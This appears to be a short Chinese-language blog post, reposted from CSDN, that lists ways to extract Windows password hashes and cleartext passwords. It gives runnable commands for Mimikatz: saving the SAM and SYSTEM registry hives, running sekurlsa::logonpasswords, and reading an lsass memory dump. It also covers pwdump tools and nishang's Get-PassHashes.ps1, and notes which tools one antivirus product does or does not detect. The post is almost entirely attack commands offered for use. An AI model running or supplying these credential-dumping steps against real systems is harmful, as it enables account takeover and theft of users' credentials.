工具试用:获取哈希

0X01 GetPass.exe

1、GetPass.exe

  • 32位下使用
  • 需要管理员权限
  • 小H伞直接报

2、GetPassword_x64.exe

  • 64位下使用
  • 需要管理员权限
  • 小H伞未报

0X02 pwdump7.exe

  • 结果为用户名,哈希。星号代表空。

0X03 Quarks-pwdump.exe

  • 哈希前半部分以“AAD3...”开头的代表空。

0X04  Mimikatz

//目标机器执行
reg save hklm\sam sam.hive
reg save hklm\system system.hive
//本地mimikatz执行
lsadump::sam /sam:sam.hive /system:system.hive

0X05 Mimikatz

在线读取SAM获取Hash及密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

0X06  Mimikatz读取sam

mimikatz.exe
privilege::debug
token::elevate
lsadump::sam

0X07 Mimikatz离线读取lsass

//第一步:dump lsass.exe
//第二步:mimikatz读取lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

0X08 PowerShell dump Hash

// nishang-master\Gather\Get-PassHashes.ps1
import-module .\Get-PassHashes.ps1
Get-PassHashes

发布了55 篇原创文章 · 获赞 1 · 访问量 2733

猜你喜欢

转载自blog.csdn.net/prettyX/article/details/103672861